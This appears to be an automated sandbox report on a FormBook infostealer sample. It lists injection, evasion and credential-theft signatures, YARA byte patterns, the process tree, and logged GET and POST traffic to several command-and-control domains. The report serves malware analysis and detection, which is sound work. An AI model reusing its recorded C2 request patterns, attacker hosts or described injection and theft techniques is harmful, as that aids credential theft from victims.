
Analysis Report Scan_06032020.exe

Overview

General Information

Sample Name: Scan_06032020.exe
MD5: c2f53f0cfafa04b343af62cccedcee13
SHA1: b189bf5ac157a99e16b4b81200bb08c6d9b55e7c
SHA256: 459e0f1ce8ec71d78d27f50fa6978046b9fb741f322f66cb300332fce233da25

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Scan_06032020.exe (PID: 2616 cmdline: 'C:\Users\user\Desktop\Scan_06032020.exe' MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
    • Scan_06032020.exe (PID: 4304 cmdline: {path} MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
      • explorer.exe (PID: 2880 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • NETSTAT.EXE (PID: 4024 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 4520 cmdline: /c del 'C:\Users\user\Desktop\Scan_06032020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • ufipp6ljxlz.exe (PID: 4924 cmdline: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
          • ufipp6ljxlz.exe (PID: 4316 cmdline: {path} MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
        • wlanext.exe (PID: 4168 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x106519:$sqlite3step: 68 34 1C 7B E1
      • 0x10662c:$sqlite3step: 68 34 1C 7B E1
      • 0x132139:$sqlite3step: 68 34 1C 7B E1
      • 0x13224c:$sqlite3step: 68 34 1C 7B E1
      • 0x106548:$sqlite3text: 68 38 2A 90 C5
      • 0x10666d:$sqlite3text: 68 38 2A 90 C5
      • 0x132168:$sqlite3text: 68 38 2A 90 C5
      • 0x13228d:$sqlite3text: 68 38 2A 90 C5
      • 0x10655b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x106683:$sqlite3blob: 68 53 D8 7F 8C
      • 0x13217b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x1322a3:$sqlite3blob: 68 53 D8 7F 8C
(28 further memory dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.Scan_06032020.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.Scan_06032020.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18429:$sqlite3step: 68 34 1C 7B E1
        • 0x1853c:$sqlite3step: 68 34 1C 7B E1
        • 0x18458:$sqlite3text: 68 38 2A 90 C5
        • 0x1857d:$sqlite3text: 68 38 2A 90 C5
        • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
4.2.Scan_06032020.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.2.ufipp6ljxlz.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
17.2.ufipp6ljxlz.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x18429:$sqlite3step: 68 34 1C 7B E1
          • 0x1853c:$sqlite3step: 68 34 1C 7B E1
          • 0x18458:$sqlite3text: 68 38 2A 90 C5
          • 0x1857d:$sqlite3text: 68 38 2A 90 C5
          • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
(7 further unpacked PE entries not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: www.porcber.com | Virustotal: Detection: 7%
Source: http://www.porcber.com | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Qor0xv4i\ufipp6ljxlz.exe | Virustotal: Detection: 16%
Source: C:\Users\user\AppData\Local\Temp\Qor0xv4i\ufipp6ljxlz.exe | ReversingLabs: Detection: 48%
Multi AV Scanner detection for submitted file
Source: Scan_06032020.exe | Virustotal: Detection: 16%
Source: Scan_06032020.exe | ReversingLabs: Detection: 48%
Yara detected FormBook
Source: Yara match | File source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE
Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.Scan_06032020.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4x nop then pop edi | 4_2_00417D66
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi | 6_2_02E77D66
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 4x nop then pop edi | 17_2_00417D66

Networking:

Uses netstat to query active network connections and open ports
Source: unknown | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic | HTTP traffic detected: GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=zRviVb12Px76SVCKitHf+uVyG4hjRZm88E4tC4j/EoSJrWOXPrlkHBEChoOc3I+b1pYC HTTP/1.1 | Host: www.icbjesusdenazaret.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /mq3/?qFNHgHIH=2djJOWHKUa/XxXSGb5U/NgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tDbPKdrqRi+&1bxh=3fSHFPhPtFX80vu0 HTTP/1.1 | Host: www.porcber.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtRwHyjq2IhIJtEgxo1RriYdWCfaHj HTTP/1.1 | Host: www.hugoph.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 199.34.228.59 199.34.228.59
Source: Joe Sandbox View | ASN Name: unknown unknown
Source: global traffic | HTTP traffic detected: POST /mq3/ HTTP/1.1 | Host: www.porcber.com | Connection: close | Content-Length: 146542 | Cache-Control: no-cache | Origin: http://www.porcber.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.porcber.com/mq3/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: (raw request body omitted)
Source: global traffic | HTTP traffic detected: POST /mq3/ HTTP/1.1 | Host: www.hugoph.com | Connection: close | Content-Length: 146542 | Cache-Control: no-cache | Origin: http://www.hugoph.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.hugoph.com/mq3/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: (raw request body omitted)
Source: unknown | DNS traffic detected: queries for: www.icbjesusdenazaret.net
Source: unknown | HTTP traffic detected: POST /mq3/ HTTP/1.1 | Host: www.porcber.com | Connection: close | Content-Length: 146542 | Cache-Control: no-cache | Origin: http://www.porcber.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.porcber.com/mq3/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: (raw request body omitted)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 04 Jun 2020 07:23:52 GMT | Server: Apache | Set-Cookie: is_mobile=0; path=/; domain=www.icbjesusdenazaret.net | Vary: X-W-SSL,User-Agent | Set-Cookie: language=en; expires=Thu, 18-Jun-2020 07:23:52 GMT; Max-Age=1209600; path=/ | Cache-Control: private | X-Host: pages23.sf2p.intern.weebly.net | X-UA-Compatible: IE=edge,chrome=1 | Content-Length: 3803 | Content-Type: text/html; charset=UTF-8 | Data Raw: (raw response body omitted)
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.560432526.0000000002630000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adob1
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.3dcellmodelscongress.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.3dcellmodelscongress.com/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.3dcellmodelscongress.com/mq3/www.tams.rocks
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.3dcellmodelscongress.comReferer:
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.aaronnational.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.aaronnational.com/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.aaronnational.com/mq3/www.askcopdtreatmentok.live
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.aaronnational.comReferer:
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.askcopdtreatmentok.live
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.askcopdtreatmentok.live/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.askcopdtreatmentok.live/mq3/www.snagabag31.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.askcopdtreatmentok.liveReferer:
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.greenerpharms.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.greenerpharms.com/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.greenerpharms.com/mq3/www.sj233.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.greenerpharms.comReferer:
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1162864887.0000000003A79000.00000004.00000001.sdmp | String found in binary or memory: http://www.hugoph.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1162864887.0000000003A79000.00000004.00000001.sdmp | String found in binary or memory: http://www.hugoph.com/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.hugoph.com/mq3/www.xn--3bst11cpvj0o2a.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.hugoph.comReferer:
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.icbjesusdenazaret.net
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.icbjesusdenazaret.net/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.icbjesusdenazaret.net/mq3/www.porcber.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.icbjesusdenazaret.netReferer:
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.operatorcloud.net
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.operatorcloud.net/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.operatorcloud.net/mq3/www.aaronnational.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.operatorcloud.netReferer:
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.porcber.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.porcber.com/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.porcber.com/mq3/www.hugoph.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.com/mq3/www.operatorcloud.net
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.com/mq3/www.greenerpharms.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.comReferer:
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.com/mq3/www.wwwx36599.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.com/mq3/www.3dcellmodelscongress.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocks
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocks/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocks/mq3/www.yoxi.ltd
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocksReferer:
          Source: ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.com/mq3/S
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.com/mq3/www.r-ev-ival.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltd
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltd/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltd/mq3/www.rolex218238.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltdReferer:
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: ufipp6ljxlz.exe, 00000010.00000002.880761472.0000000003210000.00000004.00000001.sdmpString found in binary or memory: https://github.com/KamilBest/2048Game
          Source: NETSTAT.EXE, 00000006.00000002.1159788515.0000000002E38000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?hl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=190
          Source: NETSTAT.EXE, 00000006.00000002.1163098006.0000000003D6F000.00000004.00000001.sdmpString found in binary or memory: https://www.hugoph.com/mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtR
